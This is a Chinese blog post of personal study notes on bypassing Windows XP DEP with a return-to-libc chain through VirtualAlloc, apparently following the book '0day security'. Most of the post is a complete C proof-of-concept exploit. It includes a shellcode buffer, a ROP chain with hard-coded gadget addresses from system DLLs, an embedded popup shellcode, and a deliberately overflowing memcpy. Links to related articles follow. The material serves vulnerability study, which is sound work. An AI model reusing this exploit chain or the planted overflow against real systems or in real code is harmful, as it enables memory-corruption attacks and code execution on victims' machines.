Ret2libc 利用 VirtualAlloc

最新推荐文章于 2022-11-05 22:01:06 发布
最新推荐文章于 2022-11-05 22:01:06 发布
阅读量713 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zcc1414/article/details/21937279

此文章只是 笔记··································

下面的实验 还是 memcpy 进行 不能直接利用

LPVOID VirtualAlloc(
LPVOID lpAddress, // 要分配的内存区域的地址     0x00030000
DWORD dwSize,     // 分配的大小                 0xff
DWORD flAllocationType, // 分配的类型           0x1000  MEM_COMM
DWORD flProtect   // 该内存的初始保护属性       0x40
);

函数成功 返回 申请内存的起始地址······申请失败 返回NULL


构造玩参数后 直接跳向 VirtualAllocEx

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>

char shellcode[]=

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"

/*
地址=7D72E0E5
消息=Found:PUSH ESP POP EBP RET 4 at 0x7d72e0e5     Module:  C:\WINDOWS\system32\shell32.dll*/

"\xe5\xe0\x72\x7d"//修正EBP retn 4
"\xf4\x9a\x80\x7C"// 7C809AF4    E8 09000000     call kernel32.VirtualAllocEx

"\x90\x90\x90\x90"
"\xFF\xFF\xFF\xFF"//-1当前进程
"\x00\x00\x03\x00"//申请空间起始地址
"\xFF\x00\x00\x00"//申请空间大小
"\x00\x10\x00\x00"//申请类型
"\x40\x00\x00\x00"//申请空间访问类型
"\x90\x90\x90\x90"
/*
7C80997D    58              pop eax   kernerl32.dll
7C80997E    C3              retn
*/
"\x7d\x99\x80\x7c"//pop eax retn

"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
/*
地址=7C94D75D
消息=Found:POP EDI POP ESI  RETN at 0x7c94d75d     Module:  C:\WINDOWS\system32\ntdll.dll
*/
"\x5d\xd7\x94\x7C"//pop pop retn
"\xe5\xe0\x72\x7d"//修正EBP retn4

/*
地址=7D74CFDA
消息=Found:POP EBX  RETN at 0x7d74cfda     Module:  C:\WINDOWS\system32\shell32.dll
*/
"\xda\xcf\x74\x7d"

"\x00\x00\x03\x00"//可执行内存空间地址,转入执行用
"\x00\x00\x03\x00"//可执行内存空间地址,拷贝用

/*
77EBC6C6    54              push esp
*/
"\xc6\xc6\xeb\x77"//push esp jmp eax && 原始shellcode起始地址
"\xFF\x00\x00\x00"//shellcode长度

"\x75\x6f\xc1\x77"//memcpy 77C16F75    8B75 0C         mov esi,dword ptr ss:[ebp+0xC]



"\x00\x00\x03\x00"//一个可以读地址
"\x00\x00\x03\x00"//一个可以读地址
"\x90\x90\x90\x90"

"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";//168

void test()
{
	char tt[176];
	memcpy(tt,shellcode,450);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
    return 0;
}

尽量 寻找  系统DLL上的代码  不要程序自身的代码 当然也有例外·······实验得真理······················





















0day 第12章--12.3.3 Ret2Libc实战利用VirtualAlloc
I have a dream
04-08 493
实验环境: Winxp sp3 VS2010 实验配置: 禁用优化、关闭GS、关闭safeseh、开启DEP 思路:当程序需要一段可执行内存时,可以通过kernel32.dll的VirtualAlloc申请一段具有可执行属性的内存。因此可通过利用此函数将shellcode复制到申请的内存空间中,以绕过DEP。 如何利用? 将返回地址覆盖为VirtualAlloc的地址,参数输入进去即可。 ...
利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
Yx0051的博客
08-09 1310
终于看到著名的DEP机制了,今天可以好好的研究它了! DEP基本原理就是数据所在内存页标识为不可执行,这样就导致一个问题,就是我们之前所有的实验都建立在一个基础上:shellcode的执行是位于堆或者栈上的,我们通过覆盖上面的正常数据,将可执行的恶意数据放在上面进行程序流程劫持。后来,微软的程序员就发现了这个致命的漏洞,就创建了这个机制:从XP SP2开始,CPU一旦检测到在非可执行区域执行指令
Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP
weixin_34268843的博客
09-19 657
本文讲的是Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP, 0x00 前言 接着介绍DEP绕过的另一种方法——利用VirtualAlloc绕过DEP。通过VirtualAlloc函数可以申请一段具有可执行属性的内存,相比于VirtualProtect,传入VirtualAlloc的四个参数不需要先读取再赋值,可在s...
0day安全:软件漏洞分析技术(第2版)
weixin_33910385的博客
01-08 2434
0day安全:软件漏洞分析技术(第2版) 基本信息 作者:王清   张东辉   周浩   王继刚   赵双   丛书名:安全技术大系 出版社:电子工业出版社 ISBN:9787121133961 上架时间:2011-6-27 出版日期:2011 年6月 http://product.china-pub.com/194031 《0day安全:软件漏洞分析技术(...
9.2 Ret2Libc实战利用ZwSetInformationProcess
qq_55202378的博客
11-05 1598
DEP ZwSetInformationProcess
Ret2Libc 实战利用 ZwSetInformationProcess
weixin_30237281的博客
03-11 457
参考 《0day安全软件漏洞分析技术第二版》第12章 攻击未开启DEP的程序 思路: 微软要考虑兼容性的问题,所以不能对所有进程强制开启 DEP(64 位下的 AlwaysOn 除外)。 DEP 保护对象是进程级的,当某个进程的加载模块中只要 有一个模块不支持 DEP,这个进程就不能贸然开启 DEP,否则可能会发生异常。 这种攻击手段不与 DEP 有着正面冲突,只是一种普通的溢出攻击。 利用 R...
《0day安全》利用 Ret2Libc 挑战 DEP
weixin_50287973的博客
09-21 325
溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷。 DEP(数据执行保护,Data Execution Prevention)就是用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 利用 Ret2Libc 挑战 DEP 绕过 DEP的 exploit 方法: (1)通过跳转到 ZwSetInformationProc
福昕阅读器 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow
太阳风的专栏
11-06 5488
之前在 ISCC2013 线上赛的时候,这个溢出题没能做出来,现在正好在学习溢出,想重现下漏洞。 http://www.exploit-db.com/exploits/23944/ exploit-db 上有简略的描述 测试环境: Microsoft Windows 7 sp1 Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920
《0day安全》——数据与程序的分水岭:DEP
sunr_的博客
08-31 657
DEP机制的保护原理 溢出攻击的根源在于区分不了代码与数据。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 DEP 的主要作用是阻止数据页(如默认的堆页、各种堆栈页以及内存池页)执行代码。微软从 Windows XP SP2 开始提供这种技术支持,根据实现的机制不同可分为:软件 DEP( Software DEP)和硬件 DEP( Hardware-enforced DEP
Writing JIT-Spray Shellcode for fun and profit
06-19
在这种情况下,仅剩的方法就是ret2libc攻击了。具体来说,我们可以先通过调用`VirtualAlloc()`分配一段内存区域,然后使用`memcpy()`将shellcode拷贝到这块新分配的内存中,最后返回到这片内存区执行shellcode。不过...
ImmunityDebugger 学习
zcc1414的专栏
03-12 6685
Immunity  Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以 及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为 强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融 合于一体,它还附带了一套高度可定制的纯python图形算法,可用于帮助我们绘 制出直观的函数体控制流以及函数中的各个基本块。 只是学习记录,别无
ASLR 基本概念
zcc1414的专栏
09-17 4439
ASLR (Address Space Layout Randomization) 通过加载程序时候不再使用固定的基址加载,从而干扰shellcode定位的一种保护机制 windows Vista出现后,ASLR 才真正开始发挥作用 VS2005 添加 /dynmicbase 就可以支持 ASLR VS2008 linker->Randomized Base Address 设置 包含
Ret2Libc学习NtSetInformationProcess DEP
zcc1414的专栏
09-15 3740
程序跳向非可执行代码上   DEP保护下溢出失败 Ret2libc (Return to libc) 原理  :   跳向一个已经存在的系统函数,DEP不会拦截 。 1) ZwSetInformationProcess函数将DEP关闭后再转入 shellcode执行 2)VirtualProtect 函数来将shellcode所在内存页设置为可执行,再转入shellcode执行 3)Vir
shellcode 进行加密原理
zcc1414的专栏
08-01 3270
对shellcode 进行加密: #include "stdio.h" char popup_general[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x
matasploit+shellcode编码学习
zcc1414的专栏
03-16 3153
首先下面额指令都是我用到时记录的,可以说是经常用到吧 先找到memdump.exe文件: C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe 在CMD下 运行  memdump.exe 进程PID c:\abc 然后进入console 运行   msfpescan -p -m c:/abc
寻找复活节彩蛋egg huting 学习
zcc1414的专栏
06-02 2499
寻蛋技术是
DWORD SHOOT
zcc1414的专栏
08-29 2400
我知道原理了: 当 int remove() { node->blink->flink = node->flink; //这个是flink   \x88\x06\x36\x00     这个是blink   //\x20\xf0\xfd\x7f";    //将系统RtlEnterCritucalSection 的 flink指向 我们的shellcode起始地址  造成DWORD S
内核漏洞基础初学
zcc1414的专栏
11-06 2057
终于开始看这个东西了,等了很久,迷失自己很久了~~~~~~~~~
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值